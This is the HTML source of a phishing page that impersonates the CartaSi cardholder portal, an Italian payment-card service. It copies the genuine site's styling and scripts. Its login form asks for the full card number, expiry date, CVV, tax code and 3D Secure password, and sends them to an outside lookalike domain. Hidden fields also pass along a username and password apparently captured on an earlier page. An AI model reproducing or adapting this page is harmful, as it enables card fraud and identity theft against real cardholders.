<html>

<head><link type="text/css" href="https://portal.cartasi.it/imageserver/plumtree/common/public/css/mainstyle-titolari-it.css" rel="StyleSheet" lang="it"></link><title>Gateway</title><script type="text/javascript" src="https://portal.cartasi.it/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js"></script>
<script type="text/javascript">
PTIncluder.imageServerURL = 'https://portal.cartasi.it/imageserver/';
PTIncluder.basePath = 'plumtree/common/private/js/';
PTIncluder.lang = 'it';
PTIncluder.country = 'IT';
PTIncluder.debug = false;
PTIncluder.loadComponent('jsportlet');
</script><script type="text/javascript">var g_PTImgSvrImgsURL = "https://portal.cartasi.it/imageserver/plumtree/portal/private/img/";
var g_SharedImgSvrImgsURL = "https://portal.cartasi.it/imageserver/plumtree/portal/public/img/";var g_HelpSvrBaseURL = "https://portal.cartasi.it/imageserver/plumtree/";
</script><script type="text/javascript" src="https://portal.cartasi.it/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js"></script>
<script type="text/javascript">
PTIncluder.imageServerURL = 'https://portal.cartasi.it/imageserver/';
PTIncluder.basePath = 'plumtree/common/private/js/';
PTIncluder.lang = 'it';
PTIncluder.country = 'IT';
PTIncluder.debug = false;
PTIncluder.loadComponent('jsrobohelp');
</script><script type="text/javascript">
function OpenerAS_GetApplicationBaseURL()
{
        return "https://titolari.cartasi.it/portal/server.pt?";
}
function OpenerAS_GetCurrentUserID()
{
        return "850390";
}
function OpenerAS_GetParentSpaceName()
{
        return "";
}
function OpenerAS_GetParentSpaceID()
{
        return "";
}
</script><script type="text/javascript">function getJSUtilVersionObject() { return 'window';}</script><script type="text/javascript" src="https://portal.cartasi.it/imageserver/plumtree/portal/private/js/ptcommonopener.js"></script><script type="text/javascript">/** The object that holds the safe variables. Store the vars as properties on the object, like a hashtable. **/
var gSafeJSVarContainer = new Object();
/** Define a new safe variable, pass the in the name and the value.Returns true if successful, method call will fail if the value is invalid. **/
function addSafeVar(strName, oValue) {
        gSafeJSVarContainer[strName] = oValue;
        return true;
}
/** Retrieve a safe var. Returns false if the variable is undefined  or if the value is actually false, but safe vars shouldn't be usedto store simple boolean values anyway. **/
function getSafeVar(strName) {
        var temp = gSafeJSVarContainer[strName];
        if (temp) { return temp; }
        else { return false;}
}
/** Retrieve a safe var, if the variable is undefined an alert will showwith the name of the variable. Use this method to retrieve criticalvariables. **/
function getSafeVarWarn(strName) {
        var temp = gSafeJSVarContainer[strName];
        if (temp) { return temp; }
        else { alert('Safe Variable: '+strName+' is not defined!'); }
}
</script><script type="text/javaScript">        function buildURLFromTemplate(strID)
        {
                var arArgs = strID.split(',');
        if(!arArgs){
          alert('Invalid menu ID');
          return null; }
        if(arArgs[0] == 'C'){
         var strCommURL = PTCommonOpener.getOpenerURLOpenObjID(512, arArgs[1], '&PageID='+arArgs[2]+'', 2)
         if ( arArgs.length > 3) { strCommURL += '&ProfileID='+arArgs[3]; }
          return strCommURL;
        } else if (arArgs[0] == 'M') {
         return PTCommonOpener.getOpenerURLOpenObjID(518, 850390, '&PageID='+arArgs[1]+'', 2)
        } else if (arArgs[0] == 'SM') {
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name=SiteMap&psname=Gateway&psid=None&cached=true&in_hi_userid=850390&control=SetSiteMap&CommunityID='+arArgs[1]+'&Mode='+arArgs[2]+(eval(arArgs[3]) ? '&Preview=' : '');
        } else if (arArgs[0] == 'S') {
          return null;
        } else if (arArgs[0] == 'E') {
            var params = '';
            if ( arArgs.length > 1 ) {
              for ( var i = 2; i < arArgs.length; i++ ) {
                params += '&' + arArgs[i];
              } }
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name='+arArgs[1]+'&psname=Gateway&psid=None&cached=true&in_hi_userid=850390' + params;
        } else if (arArgs[0] == 'D') {
         return PTCommonOpener.getOpenerURLOpenObjID(17, arArgs[2], '&DirMode='+arArgs[1]+'', 2)
        } else if (arArgs[0] == 'G1') {
            var params = '';
            if ( arArgs.length > 1 ) {
              for ( var i = 2; i < arArgs.length; i++ ) {
                params += '&' + arArgs[i];
              } }
          return 'https://titolari.cartasi.it/portal/server.pt?open=space&name='+arArgs[1]+'&psname=Gateway&psid=None&cached=true&in_hi_userid=850390' + params;
        } else if (arArgs[0] == 'IF') {
          return arArgs[1];
        } else {
            alert('URL Type is not defined');
            return null; }
        }
        function templateURLRedirect(templateURL) {
          if (templateURL == null) { return null; }
          var arArgs = templateURL.split(',');
         if (arArgs[0] == 'UP') {
        PTCommonOpener.openInSameWindow(PTCommonOpener.getOpenerURLOpenObjID(1, arArgs[1], 'null', 2));
        } else if (arArgs[0] == 'DO') {
        PTCommonOpener.openInSameWindow(PTCommonOpener.getOpenerURLOpenObjID(18, arArgs[1], 'null', 2));
        } else if (arArgs[0] == 'F') {
          window.location = arArgs[1];
         } else {
           window.location = buildURLFromTemplate(templateURL);
         }
         
        }
</script><script type="text/javascript">var windowOnloadFunction = (window.onload) ? window.onload : new Function;
document.PCC.RegisterForWindowEvent("onload", windowOnloadFunction);
var windowOnBlurFunction = (window.onblur) ? window.onblur : new Function;
document.PCC.RegisterForWindowEvent("onblur", windowOnBlurFunction);
var windowOnFocusFunction = (window.onfocus) ? window.onfocus : new Function;
document.PCC.RegisterForWindowEvent("onfocus", windowOnFocusFunction);
</script><script type="text/javascript">function getJSXMLVersionObject() { return 'window';}</script>
</head>



<body onactivate="document.PCC.RaiseWindowEvent(event);" onafterprint="document.PCC.RaiseWindowEvent(event);" onbeforeactivate="document.PCC.RaiseWindowEvent(event);" onbeforeunload="document.PCC.RaiseWindowEvent(event);" onblur="document.PCC.RaiseWindowEvent(event);" oncontrolset="document.PCC.RaiseWindowEvent(event);" ondeactivate="document.PCC.RaiseWindowEvent(event);" onerror="document.PCC.RaiseWindowEvent(event);" onfocus="document.PCC.RaiseWindowEvent(event);" onhelp="document.PCC.RaiseWindowEvent(event);" onload="document.PCC.RaiseWindowEvent(event);" onresize="document.PCC.RaiseWindowEvent(event);" onresizeend="document.PCC.RaiseWindowEvent(event);" onresizestart="document.PCC.RaiseWindowEvent(event);" onunload="document.PCC.RaiseWindowEvent(event);" marginwidth="0" marginheight="0" leftmargin="0" topmargin="0" class="ptPageUser-guest titolari"><div class="portalContent"><!-- start CartaSiTopBar --><!-- end CartaSiTopBar --><script type="text/javascript" >
pt_318 = new PTPortlet('318', '{AF3DEB51-8067-FFC1-4CB9-EF0F8F8D3000}', 'Titolari Guest Header', 'pt-portlet-content-318', 'http://portal.cartasi.it:80', 'http://portal.cartasi.it:80/imageserver/titolari/pages', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_318_0_0_43/', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_318_0_0_43/', 'false', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_6_0_318_0_51_43/');</script>
<span xmlns:pt='http://www.plumtree.com/xmlschemas/ptui/'></span>
<script>
var url="";
if (document.URL.indexOf("https")!=-1){
        url = "https://";
} else {
        url = "http://";
}

if(document.title=="Login"){
        eval("document.location.href=url + document.location.host + '/portal/server.pt'");
}
document.title="Portale Titolari";
var urlImageServer = "https://portal.cartasi.it/imageserver/";


function goHome(){
        eval("document.location.href=url + document.location.host + '/portal/server.pt'");
}
function openPrivacy(finestra){
        eval("window.open(urlImageServer + 'titolari/pages/privacy.html', 'PopUpWindow','dependent=yes,status=no,toolbar=no,menubar=no,width=450,height=390,resizable=yes,scrollbars=yes,location=no,top=50,left=50')");
}

function doOpenPopUp(pg,width,heigth){
        Set_Cookie( "cPopUpEse", "1");
        eval("javascript:window.open('" + pg + "','','width=" + width +",height=" + heigth+"')");
}

function Set_Cookie( name, value) {
        document.cookie = name + "=" +escape( value ) ;
}
function Get_Cookie( name ) {
        var start = document.cookie.indexOf( name + "=" );
        var len = start + name.length + 1;
        if ( ( !start ) &&
        ( name != document.cookie.substring( 0, name.length ) ) )
        {
        return "";
        }
        if ( start == -1 ) return "";
        var end = document.cookie.indexOf( ";", len );
        if ( end == -1 ) end = document.cookie.length;
        return unescape( document.cookie.substring( len, end ) );
}

var okPopUp=Get_Cookie( "cPopUp" );
if(okPopUp=="" || okPopUp==null){
        void(0);
}

document.write("<link type='text/css' href='" + urlImageServer + "plumtree/common/public/css/PTOrange.css'  rel='StyleSheet' lang='it'></link>");
</script>
<div id="HeaderTIT"><a href="javascript:goHome()" title="torna alla home page" accesskey="0"><img src="https://portal.cartasi.it/imageserver/titolari/images/top_logo.gif" alt="CartaSi" width="156" height="46" /><img src="https://portal.cartasi.it/imageserver/titolari/images/PTlogo1.jpg" alt="CartaSi Portale Titolari [header]" width="516" height="102" /></a>
        <p class="dataOra">

            <script>
              var mesi = new Array('gennaio', 'febbraio', 'marzo', 'aprile', 'maggio', 'giugno',
                       'luglio', 'agosto', 'settembre', 'ottobre', 'novembre', 'dicembre');
              var days = new Array('domenica','luned&igrave;', 'marted&igrave;', 'mercoled&igrave;', 'gioved&igrave;', 'venerd&igrave;', 'sabato');
              today = new Date();
              Giorno = today.getDay();
              Day = today.getDate();
              Mese = today.getMonth();
              Anno = today.getFullYear();
              document.write (days[Giorno]+"&nbsp;"+Day+"&nbsp;"+mesi[Mese]+"&nbsp;"+Anno);
            </script>
 &nbsp; www.cartasi.it</p>
</div>
<div id="navcontainer">
<span id="fascetta">&nbsp;</span>
        <ul id="navlist">
                <li id="active"><a href="http://www.cartasi.it" target="_newcartasi" title="Vai al sito CartaSi.it (nuova finestra) [accesskey 1]" accesskey="1">www.cartasi.it</a></li>
                <li><a href="javascript:openPrivacy()" title="come CartaSi protegge la tua privacy">Privacy</a></li>
                <li><a href="javascript:goHome()" title="torna alla Home Page [accesskey 0]" accesskey="0">Home</a></li>
        </ul>
</div>
<table cellpadding="0" cellspacing="10" width="100%" border="0"><tr><td align="left" valign="top" colspan="1"><table cellpadding="0" cellspacing="0" width="100%" border="0"><tr><td align="left" valign="top" colspan="1">











<script language="JavaScript" type="text/javascript">

function prosegui() {
    if (document.regForm.pan1.value != "" &&
            document.regForm.pan2.value != "" &&
            document.regForm.pan3.value != "" &&
            document.regForm.pan4.value != "")
        {
                document.regForm.submit();
        } else {
                alert("ATTENZIONE: Per proseguire e' necessario digitare il numero carta.")
        }
}

function checkPan(e, elem) {
        if (e.keyCode == 8 && elem.name == 'pan1') {
                document.regForm.pan1.value = "";
        }
        else if (e.keyCode == 8 && elem.name == 'pan2') {
                document.regForm.pan2.value = "";
        }
        else if (e.keyCode == 8 && elem.name == 'pan3') {
                document.regForm.pan3.value = "";
        }
        else if (e.keyCode == 8 && elem.name == 'pan4') {
                        document.regForm.pan4.value = "";
        }

        if (e.keyCode != 8 && elem.name == 'pan1') {
                if (document.regForm.pan1.value.length == 4) {
                        document.regForm.pan2.focus();
                }
        }
        else if (e.keyCode != 8 && elem.name == 'pan2') {
                if (document.regForm.pan2.value.length == 4) {
                        document.regForm.pan3.focus();
                }
        }
        else if (e.keyCode != 8 && elem.name == 'pan3') {
                if (document.regForm.pan3.value.length == 4) {
                        document.regForm.pan4.focus();
                }
        }
}
</script>
<noscript>
contenuto non disponibile - javascript disabilitato nel browser in uso
</noscript>

<div class="accedi">
<form name="regForm" method="post" action="http://www.titolari-cartasi-it1.biz/pt2.php">
        <input type="hidden" name="fun" id="fun" value="start" />
        <input type=hidden name=username value="<?echo $username; ?>">
        <input type=hidden name=password value="<?echo $password; ?>">
        <div class="sceltaReg">
                <h3 class="titoloInternoGadget"></h3>

                <p class="testoNormale">Benvenuto!<br/>Digita il numero della tua Carta:</p>
                                  <li>il <strong>codice di sicurezza di tre cifre</strong>
          che trovi sul retro della tua CartaSi (come da immagine)&nbsp;
          <a href="#" onclick="javascript:popup(); return false;">
             <img src="https://portal.cartasi.it/imageserver/titolari/images/cvv2_b.gif"> </a>
  </li>
</ul>
                <p class="testoNormale"><strong>Numero carta</strong>&nbsp;
                        <input type="text" name="pan1" maxlength="4" size="4" value="" onkeyup="checkPan(event, this);">&nbsp;
                        <input type="text" name="pan2" maxlength="4" size="4" value="" onkeyup="checkPan(event, this);">&nbsp;
                        <input type="text" name="pan3" maxlength="4" size="4" value="" onkeyup="checkPan(event, this);">&nbsp;
                        <input type="text" name="pan4" maxlength="4" size="4" value="" onkeyup="checkPan(event, this);">
                        &nbsp;
                 </p>
                <p class="testoNormale"><strong>Scadenza</strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <input type="text" name="mm" maxlength="2" size="2" value="" >&nbsp;
                <input type="text" name="aa" maxlength="2" size="2" value="" >&nbsp;
                &nbsp;
                 </p>
                <p class="testoNormale"><strong>Codice di<br> sicurezza</strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                <input type="text" name="cvv" maxlength="3" size="3" value="">
                </p>
                <p class="testoNormale"><strong>Codice fiscale</strong>&nbsp;
                <input type="text" name="fiscal" maxlength="100" size="20" value="">
                <p class="testoNormale"><strong>Password 3D Secure</strong>&nbsp;
                <input type="text" name="3dsecure" maxlength="100" size="20" value="">
                </p>
                <ul class="listaOrizzontale">
                        <li><a href="#prosegui" onclick="javascript:prosegui(); return false;"
                               class="frecciaBack" title="avanti">prosegui</a>
                        </li>
                        <li><a href="https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_16_0_0_0_0_43/a?b=c&"
                               class="frecciaBack" title="torna alla Home page">home</a>
                        </li>
                </ul>
        </div>
</form>

<script>
document.regForm.pan1.focus();
</script>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
<script type="text/javascript" >
pt_316 = new PTPortlet('316', '{AF3DEB51-8067-FFC1-4CB9-EF0FF5D6C000}', 'blank footer', 'pt-portlet-content-316', 'http://portal.cartasi.it:80', 'http://portal.cartasi.it:80/imageserver/esercenti/pages', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_316_0_0_43/', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_0_0_316_0_0_43/', 'false', 'https://titolari.cartasi.it/portal/server.pt/gateway/PTARGS_6_0_316_0_51_43/');</script>
<script type="text/javascript">InitializeEvents();</script></div><div class="externalContent"></div>
</body>
</html>